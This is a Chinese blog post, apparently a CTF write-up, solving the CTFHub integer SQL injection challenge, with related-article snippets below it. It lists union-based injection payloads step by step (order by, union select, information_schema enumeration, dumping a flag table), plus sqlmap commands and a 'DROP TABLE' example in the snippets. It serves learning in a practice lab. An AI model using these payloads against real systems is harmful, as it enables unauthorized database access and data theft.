CTFHub | 整数型注入

最新推荐文章于 2024-07-29 16:48:37 发布
最新推荐文章于 2024-07-29 16:48:37 发布
阅读量2.5k 收藏 16
点赞数 8
分类专栏: CTF精进之路 文章标签: web安全 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51191308/article/details/127484912
版权

0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

整数型注入:

        (无)

网页显示内容

        

        

0x02 解题过程

        根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。

        

根据网页显示内容输入1进行测试,发现此题可能存在SQL注入

        

在URL末尾使用'and 1 = 1'和'and 1 = 2'验证是否存在SQL注入

#payload
and 1 = 1
and 1 = 2

        

'and1 = 1'语句正常执行,回显正常

and 1 = 1

        

'and1 = 2'语句正常执行,回显出错,说明此题存在SQL整数型注入

and 1 = 2

        

使用order by 判断字段数量,从order by 1开始

order by 1

        

判断字段2,使用order by 2

order by 2

        

判断字段3,使用order by 3,这里无回显,那么字段数量为2列

order by 3

        

知道字段数量为2后,可以查看数据库位置,使用union select 1,2查看未发现数据

union select 1,2

        

判断数据可能不存在数据库中,在id=1中加入负号可以查看到不存在数据库中的数据

id=-1 union select 1,2

        

修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22

id=-1 union select 1,version()

        

ⅩⅠ修改2为database(),查看数据库名,发现数据库版本为sqli

id=-1 union select 1,database()

        

ⅩⅡ查看全部数据库名

id=-1 union select 1,group_concat(schema_name)from information_schema.schemata

        

ⅩⅢ分别查看刚才获取到的数据库全部表名,最后在sqli数据库中发现名为flag的可疑表名

id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

        

ⅩⅣ查看flag表中的全部字段名

id=-1union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'

        

ⅩⅤ查看flag表中的全部数据,发现此题flag

id=-1 union select 1,group_concat(flag) from sqli.flag

        

        

0x03 SQL整数型注入

整数型注入漏洞判断:

  1. payload:and 1 = 1,语句执行正常,网页回显无差异
  2. payload:and 1 = 2,语句执行正常,无法查询出结果,网页回显存在差异

        

        

0x04 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

尼泊罗河伯
关注
专栏目录
CTFHub_SQL整数型注入(超详解)
weixin_47443077的博客
07-26 1123
CTFHub_SQL整数型注入(超详解) 相信这个过程会帮助你理解sql注入! 首先打开环境 先尝试手注,已经说明是整数型,就直接查看字段数: -1 order by 1# -1 order by 2# -1 order by 3# 发现在第三步的时候没有回显,说明字段数是2。 接着判断显示位: -1 union select 1,2# 然后查看数据库: -1 union select database(),2# 接着获取sqli数据库中的表: -1 union select 1,grou
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1118
ctfhub的SQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
CTFHUB - SQL注入-整数型和字符型注入
m0_64180167的博客
11-28 2373
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。,在管理员不知情的情况下实现非法操作,以此来实现欺骗。执行非授权的任意查询,从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。
整数型SQL注入
最新发布
qq_69100706的博客
07-29 200
CTF(Capture The Flag)竞赛中,整数型SQL注入是一种常见的挑战类型,尤其是在Web安全类的任务中。整数型注入发生在应用程序接受数字输入时,没有正确地验证或清理输入数据,导致恶意构造的数字可以被解释为SQL语句的一部分,从而执行额外的数据库查询。
ctfhub 整数型注入
plant1234的博客
06-16 1008
整数型注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata s
CTFHub整数型注入
sGanYu
07-24 2286
目录 SQL注入的前提 手动注入 sqlmap注入 SQL注入的前提 判断是否具备注入条件 可控参数如id=1,能否影响页面的显示结果 输入SQL语句的时候,是否报错,能否通过报错,看到数据库回显的一些语句痕迹 尝试使输入的语句不报错,使得成功闭合语句 判断是什么类型的注入 语句能否被修改 是否能够成功执行 手动注入 首先判断是否存在注入,输入1回显,输入2回显,输入3,无回显 根据回显内容判断为整数型 开始爆字段id=1 order by 1,当id =1.
CTFHUB——整数型SQL注入
陈艺秋的博客
01-14 1343
整型SQL注入
CTFHub - 整数型注入
Have_a_great_day的博客
09-07 634
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5490
Ctfhub解题 web SQL注入
CTFHUB-web-SQL注入
ookami6497的博客
11-29 818
CTFHUB SQL
ctfhub web全部做题记录(持续跟新)
01-08
分为整数型和字符型注入,以及报错注入。可以通过调整查询参数来获取数据库信息,甚至直接读取flag字段。 【文件上传漏洞】无验证的文件上传功能可被利用来上传恶意文件,如PHP后门。通过修改文件头,绕过前端验证...
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 577
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
[CTFHub]整数型注入web>SQL注入
ZXW_NUDT的博客
05-12 314
输入1后发现url改变 使用order by语句查询字段数 使用union联合查询检测信息回显位置 由于页面只允许返回一行内容,所以则修改参数1为-1,使需要查询的信息回返 获取当前数据库名 获取所有数据库名 查询数据库sqli表名 获取flag列所有字段名 获取指定数据库的表的列的内容 ...
CTFHUB(六)之整数型注入
ScyLamb的博客
03-03 261
直接跑sqlmap sqlmap -u http://challenge-d2092f951b60f48a.sandbox.ctfhub.com:10080/?id=1 看到可注入 sqlmap -u http://challenge-d2092f951b60f48a.sandbox.ctfhub.com:10080/?id=1 --dbs 下意识选了sqli sqlmap -u http://...
ctfhub 整数型注入(手动注入
qq_54929891的博客
09-14 478
这段时间看了web安全里面有关sql注入以及一些博客,终于基本了解了一下如何做这种题目用手动注入 第一步,判断是否有注入点(构造sql语句来比对不同) 这是按照提示输入1回显结果,我们可以利用恒真恒假来判断是否修改语句有用 发现输入恒假1=2的时候没有回显,代表有注入点,可以改变sql语句 第二步 利用order by来获取回显的信息判断字段数(因为这个题目没有引号,加不加#省略号没有影响) 发现字段数为2,order by 3的时候没有回显利用1 and 1=2恒假语句来把原先的..
ctfhub SQL 整数型注入
qq_52671379的博客
06-21 354
SQL 整数型注入 题目 当输入值为1或2时有回显 当输入3时无回显 判断是否存在注入 加单引号 对应的id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,无回显。 作为sql注入的小白,我决定不采用大佬们的方法,看不懂,先分享自己的方法,非常传统。 由以上得知有两个字段,所以第一步,爆库名; '' union select 1,database() # 第二,爆表名; '' union select 1,group_concat(table_name) from information_
CTFHub-sql注入-整数型注入
qq_54537919的博客
07-22 913
CTFHub-sql注入-整数型注入
CTFCTFHub------web-SQL注入-整数型注入
从零开始的网安生活
07-23 460
文章目录SQL注入整数型注入 SQL注入 整数型注入 1.打开链接根据提示输入1 1.先检查数据库有无注入点 python sqlmap.py -u http://challenge-7a209e58efdf655a.sandbox.ctfhub.com:10080/?id=1 得到 GET parameter 'id' is vulnerable. ...
CTFHub SQL 整数型注入
weixin_44732566的博客
02-16 3317
CTFHub SQL 整数型注入 之前那道整数型注入题改了,,,但还是一样的套路,数据库也一样,就多了一个:前端页面回显位置只有两处,而且一个正确的id回显就占了两处地方 UI界面好看了,还多了一个问题,就是前端页面一次只显示一条数据库记录 所以在payload最后加上limit x offset y 这个意思是从第y条记录开始后x条记录,y是从0开始算的 1 or 1=1 limit 1 o...
cfhubSQL 整数型注入
07-23
CFHUB SQL整数型注入通常是指在处理用户输入并用于构造SQL查询的过程中,如果对用户提供的整数值未做足够的验证或过滤,恶意用户可能会利用这种漏洞插入恶意的SQL代码。攻击者通过提交精心构造的整数,可以试图修改数据库结构、查看敏感数据或者执行非授权操作。 例如,假设有一个SQL查询是这样的: ```sql SELECT * FROM users WHERE id = <用户输入> ``` 如果没有正确的输入验证,如果用户输入了一个包含额外字符的整数,如`1; DROP TABLE users`,那么实际执行的查询将可能是: ```sql SELECT * FROM users WHERE id = 1; DROP TABLE users ``` 这可能导致数据库表被意外删除或其他安全风险。 为了防止整数型注入,应该对用户输入进行严格的验证和转义,只接受预期格式的整数值,并确保它们不会改变查询的结构或引入意外命令。同时,建议使用预编译语句或者参数化查询,这种方法可以避免直接拼接字符串,从而降低注入的风险。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值